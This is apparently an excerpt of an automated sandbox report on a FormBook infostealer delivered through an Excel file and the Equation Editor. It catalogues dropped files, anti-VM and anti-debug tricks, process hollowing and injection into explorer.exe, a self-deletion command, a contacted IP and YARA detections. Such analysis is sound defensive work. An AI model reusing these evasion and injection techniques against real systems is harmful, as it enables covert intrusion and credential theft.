Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A3DFA1 push ecx; ret		7_2_00A3DFB4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_4A5513B6 push ecx; ret		9_2_4A5513C9
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0229DFA1 push ecx; ret		9_2_0229DFB4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0008E3E7 push ebp; iretd		9_2_0008E3E8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0009678C push 00000050h; retf		9_2_0009678F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0009D7C6 push cs; retf		9_2_0009D7C7
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_00097936 push esp; retf		9_2_00097937
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0009797C push ecx; retf		9_2_0009797F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_00097C0D push ss; ret		9_2_00097C13
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0009CEB5 push eax; ret		9_2_0009CF08
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0009CF0B push eax; ret		9_2_0009CF72
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0009CF02 push eax; ret		9_2_0009CF08
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0009CF6C push eax; ret		9_2_0009CF72

.NET source code contains many randomly named methods

Source: winlog[1].exe.2.dr, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.cs	High entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
Source: winlog[1].exe.2.dr, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.cs	High entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
Source: vbc.exe.2.dr, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.cs	High entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
Source: vbc.exe.2.dr, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.cs	High entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
Source: 4.2.vbc.exe.30000.0.unpack, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.cs	High entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
Source: 4.2.vbc.exe.30000.0.unpack, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.cs	High entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
Source: 4.0.vbc.exe.30000.0.unpack, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.cs	High entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
Source: 4.0.vbc.exe.30000.0.unpack, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.cs	High entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
Source: 5.0.vbc.exe.30000.0.unpack, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.cs	High entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
Source: 5.0.vbc.exe.30000.0.unpack, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.cs	High entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
Source: 5.2.vbc.exe.30000.0.unpack, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.cs	High entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
Source: 5.2.vbc.exe.30000.0.unpack, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.cs	High entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
Source: 6.0.vbc.exe.30000.0.unpack, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.cs	High entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
Source: 6.0.vbc.exe.30000.0.unpack, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.cs	High entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
Source: 6.2.vbc.exe.30000.0.unpack, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.cs	High entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
Source: 6.2.vbc.exe.30000.0.unpack, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.cs	High entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
Source: 7.0.vbc.exe.30000.0.unpack, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.cs	High entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
Source: 7.0.vbc.exe.30000.0.unpack, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.cs	High entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
Source: 7.2.vbc.exe.30000.0.unpack, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.cs	High entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
Source: 7.2.vbc.exe.30000.0.unpack, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.cs	High entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE5

Disables application error messsages (SetErrorMode)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior

Document contains OLE streams with high entropy indicating encrypted embedded content

Source: Request for quotation.xlsx

Stream path 'EncryptedPackage' entropy: 7.99990143991 (max. 8.0)

Malware Analysis System Evasion:

Yara detected AntiVM_3

Source: Yara match

File source: Process Memory Space: vbc.exe PID: 2924, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: vbc.exe, 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp

Binary or memory string: SBIEDLL.DLLHEADKCREATEOBJECT("WSCRIPT.SHELL").RUN """

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exe	RDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exe	RDTSC instruction interceptor: First address: 0000000000089B5E second address: 0000000000089B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 7_2_00409A90 rdtsc

7_2_00409A90

Contains long sleeps (>= 3 min)

Source: C:\Users\Public\vbc.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2400	Thread sleep time: -420000s >= -30000s			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2400	Thread sleep time: -60000s >= -30000s			Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2912	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\explorer.exe TID: 1928	Thread sleep time: -30000s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\explorer.exe

Last function: Thread delayed

Contains functionality to enumerate / list files inside a directory

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_4A556E47 GetFileAttributesW,FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,		9_2_4A556E47
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_4A552E73 FindFirstFileExW,GetLastError,FindClose,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,		9_2_4A552E73
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_4A570202 FindFirstFileW,GetFullPathNameW,RemoveDirectoryW,RemoveDirectoryW,GetLastError,GetLastError,GetFileAttributesW,SetFileAttributesW,RemoveDirectoryW,GetLastError,		9_2_4A570202
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_4A56BF0C FindFirstFileW,FindNextFileW,FindClose,		9_2_4A56BF0C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_4A55BBA4 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,FindNextFileW,GetLastError,FindClose,		9_2_4A55BBA4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_4A570492 FindFirstFileW,FindFirstFileW,FindClose,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetLastError,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,FindNextFileW,FindClose,		9_2_4A570492

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: explorer.exe, 00000008.00000000.2251278805.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000000.2257941915.0000000004263000.00000004.00000001.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: vbc.exe, 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000008.00000000.2257823360.00000000041AD000.00000004.00000001.sdmp	Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
Source: explorer.exe, 00000008.00000000.2251408426.0000000000231000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}

Queries a list of all running processes

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks if the current process is being debugged

Source: C:\Users\Public\vbc.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 7_2_00409A90 rdtsc

7_2_00409A90

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\Public\vbc.exe

Code function: 7_2_0040ACD0 LdrLoadDll,

7_2_0040ACD0

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 9_2_4A56D539 LoadLibraryW,GetProcAddress,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,

9_2_4A56D539

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A20080 mov ecx, dword ptr fs:[00000030h]		7_2_00A20080
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A200EA mov eax, dword ptr fs:[00000030h]		7_2_00A200EA
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A426F8 mov eax, dword ptr fs:[00000030h]		7_2_00A426F8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_02280080 mov ecx, dword ptr fs:[00000030h]		9_2_02280080
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_022800EA mov eax, dword ptr fs:[00000030h]		9_2_022800EA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_022A26F8 mov eax, dword ptr fs:[00000030h]		9_2_022A26F8

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 9_2_4A552E73 FindFirstFileExW,GetLastError,FindClose,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,

9_2_4A552E73

Enables debug privileges

Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process token adjusted: Debug			Jump to behavior

Contains functionality to register its own exception handler

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_4A5513A9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		9_2_4A5513A9
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_4A557C63 SetUnhandledExceptionFilter,		9_2_4A557C63

Creates guard pages, often used to prevent reverse engineering and debugging

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe

Network Connect: 172.67.181.41 80

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\Public\vbc.exe	Thread register set: target process: 1388			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Thread register set: target process: 1388			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\Public\vbc.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\Public\vbc.exe

Section unmapped: C:\Windows\SysWOW64\cmd.exe base address: 4A550000

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'			Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Source: explorer.exe, 00000008.00000002.2391506511.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000008.00000002.2391506511.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000008.00000000.2251278805.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000008.00000002.2391506511.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\SysWOW64\cmd.exe	Code function: _wcsicmp,GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,memmove,GetLocaleInfoW,GetTimeFormatW,		9_2_4A55D701
Source: C:\Windows\SysWOW64\cmd.exe	Code function: GetDateFormatW,realloc,GetDateFormatW,_wcsicmp,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,memmove,GetSystemTime,SystemTimeToFileTime,memmove,GetLastError,realloc,		9_2_4A56270D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,		9_2_4A5588D9

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\Public\vbc.exe

Queries volume information: C:\Users\Public\vbc.exe VolumeInformation

Jump to behavior

Contains functionality to query local / system time

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 9_2_4A564E44 GetSystemTime,SystemTimeToFileTime,

9_2_4A564E44

Contains functionality to query the account / user name

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0038BA60 GetUserNameA,

4_2_0038BA60

Contains functionality to query windows version

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 9_2_4A55D3B3 GetVersion,

9_2_4A55D3B3

Queries the cryptographic machine GUID

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match	File source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Source: Yara match	File source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
